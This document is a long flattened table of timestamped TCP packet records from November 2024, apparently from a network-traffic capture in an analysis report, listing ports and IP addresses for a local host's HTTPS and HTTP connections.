                                                                                                                                                                Nov 23, 2024 20:36:02.032005072 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.032059908 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:02.035789013 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.035852909 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:02.039930105 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.039994001 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:02.041018009 CET49764443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:02.041027069 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.041093111 CET49764443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:02.041261911 CET49764443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:02.041275978 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.041728973 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.041784048 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:02.041837931 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.041986942 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.042011023 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:02.042020082 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.042036057 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:02.042068958 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:02.044248104 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.044294119 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.044337034 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.044351101 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.044378996 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.044398069 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.056703091 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.056772947 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.056785107 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.056802034 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.056833029 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.056854010 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.069250107 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.069294930 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.069322109 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.069334030 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.069361925 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.069380999 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.080882072 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.080940962 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.080975056 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.080986977 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.081017017 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.081037045 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.137562990 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.137607098 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.137650967 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.137665033 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.137695074 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.137733936 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.180378914 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.180425882 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.180463076 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.180475950 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.180504084 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.180541992 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.192935944 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.192986965 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.193010092 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.193022013 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.193049908 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.193068981 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.234457016 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.234539986 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.234563112 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.234579086 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.234622955 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.234622955 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.239603996 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.239700079 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.239712954 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.239763021 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.239814997 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.239986897 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.240021944 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.240061998 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.240083933 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.617506981 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:36:02.620971918 CET49766443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.621020079 CET44349766151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.621074915 CET49766443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.621769905 CET49766443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.621788025 CET44349766151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.742989063 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.882280111 CET44349760104.17.25.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.882522106 CET49760443192.168.2.4104.17.25.14
                                                                                                                                                                Nov 23, 2024 20:36:02.882540941 CET44349760104.17.25.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.883972883 CET44349760104.17.25.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.884032965 CET49760443192.168.2.4104.17.25.14
                                                                                                                                                                Nov 23, 2024 20:36:02.884346962 CET49760443192.168.2.4104.17.25.14
                                                                                                                                                                Nov 23, 2024 20:36:02.884428024 CET44349760104.17.25.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.884470940 CET49760443192.168.2.4104.17.25.14
                                                                                                                                                                Nov 23, 2024 20:36:02.925273895 CET49760443192.168.2.4104.17.25.14
                                                                                                                                                                Nov 23, 2024 20:36:02.925282001 CET44349760104.17.25.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.968290091 CET49760443192.168.2.4104.17.25.14
                                                                                                                                                                Nov 23, 2024 20:36:03.018840075 CET804974787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.048796892 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.049046040 CET49761443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:03.049072027 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.052580118 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.052648067 CET49761443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:03.052962065 CET49761443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:03.053100109 CET49761443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:03.053133965 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.062022924 CET4974780192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:36:03.093272924 CET49761443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:03.093285084 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.138062000 CET49761443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:03.202882051 CET49768443192.168.2.4185.15.58.226
                                                                                                                                                                Nov 23, 2024 20:36:03.202919006 CET44349768185.15.58.226192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.202980042 CET49768443192.168.2.4185.15.58.226
                                                                                                                                                                Nov 23, 2024 20:36:03.203174114 CET49768443192.168.2.4185.15.58.226
                                                                                                                                                                Nov 23, 2024 20:36:03.203190088 CET44349768185.15.58.226192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.339453936 CET44349760104.17.25.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.339600086 CET44349760104.17.25.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.339657068 CET49760443192.168.2.4104.17.25.14
                                                                                                                                                                Nov 23, 2024 20:36:03.339679956 CET44349760104.17.25.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.339764118 CET44349760104.17.25.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.339817047 CET49760443192.168.2.4104.17.25.14
                                                                                                                                                                Nov 23, 2024 20:36:03.339824915 CET44349760104.17.25.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.339920044 CET44349760104.17.25.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.339963913 CET49760443192.168.2.4104.17.25.14
                                                                                                                                                                Nov 23, 2024 20:36:03.339971066 CET44349760104.17.25.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.349643946 CET44349760104.17.25.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.349711895 CET49760443192.168.2.4104.17.25.14
                                                                                                                                                                Nov 23, 2024 20:36:03.349720001 CET44349760104.17.25.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.358262062 CET44349760104.17.25.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.358319044 CET49760443192.168.2.4104.17.25.14
                                                                                                                                                                Nov 23, 2024 20:36:03.358326912 CET44349760104.17.25.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.405441046 CET49760443192.168.2.4104.17.25.14
                                                                                                                                                                Nov 23, 2024 20:36:03.445035934 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.445298910 CET49764443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:03.445311069 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.448476076 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.448538065 CET49764443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:03.448961020 CET49764443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:03.449042082 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.449126959 CET49764443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:03.449135065 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.479820013 CET44349760104.17.25.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.499212980 CET49764443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:03.530467987 CET49760443192.168.2.4104.17.25.14
                                                                                                                                                                Nov 23, 2024 20:36:03.530481100 CET44349760104.17.25.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.536837101 CET44349760104.17.25.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.536895990 CET49760443192.168.2.4104.17.25.14
                                                                                                                                                                Nov 23, 2024 20:36:03.536905050 CET44349760104.17.25.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.537123919 CET44349760104.17.25.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.537174940 CET49760443192.168.2.4104.17.25.14
                                                                                                                                                                Nov 23, 2024 20:36:03.537273884 CET49760443192.168.2.4104.17.25.14
                                                                                                                                                                Nov 23, 2024 20:36:03.537288904 CET44349760104.17.25.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.545685053 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.545810938 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.545861006 CET49761443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:03.545886040 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.545994043 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.546060085 CET49761443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:03.546066999 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.553914070 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.553975105 CET49761443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:03.553982973 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.562141895 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.562199116 CET49761443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:03.562207937 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.608575106 CET49761443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:03.608591080 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.655438900 CET49761443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:03.684799910 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.688976049 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.689028025 CET49761443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:03.689038038 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.733582973 CET49761443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:03.761914015 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.772658110 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.772739887 CET49761443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:03.772752047 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.772782087 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.772829056 CET49761443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:03.781059980 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.789311886 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.789390087 CET49761443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:03.789414883 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.797700882 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.797768116 CET49761443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:03.797791958 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.806103945 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.806178093 CET49761443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:03.806202888 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.814538002 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.814618111 CET49761443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:03.814641953 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.822843075 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.822938919 CET49761443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:03.822962999 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.831192017 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.831265926 CET49761443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:03.831290007 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.847067118 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.847203970 CET49761443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:03.847229004 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.854840994 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.854928017 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.854919910 CET49761443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:03.854955912 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.855003119 CET49761443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:03.862740993 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.870271921 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.870321035 CET49761443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:03.870352983 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.870507956 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.870559931 CET49761443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:03.870735884 CET49761443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:03.870750904 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.900737047 CET44349766151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.900921106 CET49766443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:03.900945902 CET44349766151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.902368069 CET44349766151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.902420998 CET49766443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:03.902785063 CET49766443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:03.902863979 CET44349766151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.902928114 CET49766443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:03.902941942 CET44349766151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.941883087 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.941936970 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.941970110 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.941999912 CET49764443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:03.942004919 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.942019939 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.942048073 CET49764443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:03.942095041 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.942133904 CET49764443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:03.942143917 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.950345993 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.950392962 CET49764443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:03.950404882 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.952311039 CET49766443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:03.958846092 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:03.959043980 CET49764443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:03.959065914 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.014842033 CET49764443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:04.014852047 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.061737061 CET49764443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:04.142632008 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.145087004 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.145162106 CET49764443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:04.145186901 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.161128998 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.161204100 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.161210060 CET49764443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:04.161233902 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.161278009 CET49764443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:04.169194937 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.177203894 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.177269936 CET49764443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:04.177278042 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.185239077 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.185307026 CET49764443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:04.185316086 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.193285942 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.193351030 CET49764443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:04.193358898 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.201438904 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.201515913 CET49764443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:04.201524973 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.209220886 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.209309101 CET49764443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:04.209316969 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.216744900 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.216820955 CET49764443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:04.216828108 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.264892101 CET49764443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:04.264921904 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.311758995 CET49764443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:04.333906889 CET44349766151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.334477901 CET44349766151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.334553003 CET49766443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:04.334583044 CET44349766151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.343291044 CET44349766151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.343370914 CET49766443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:04.343395948 CET44349766151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.344080925 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.347984076 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.348057985 CET49764443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:04.348083973 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.352138996 CET44349766151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.352216959 CET49766443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:04.352241993 CET44349766151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.354078054 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.354145050 CET49764443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:04.354154110 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.361660004 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.361694098 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.361728907 CET49764443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:04.361748934 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.361793041 CET49764443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:04.364289045 CET44349766151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.364350080 CET49766443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:04.364375114 CET44349766151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.369271994 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.369337082 CET44349764104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:04.369394064 CET49764443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:04.369534016 CET49764443192.168.2.4104.18.10.207
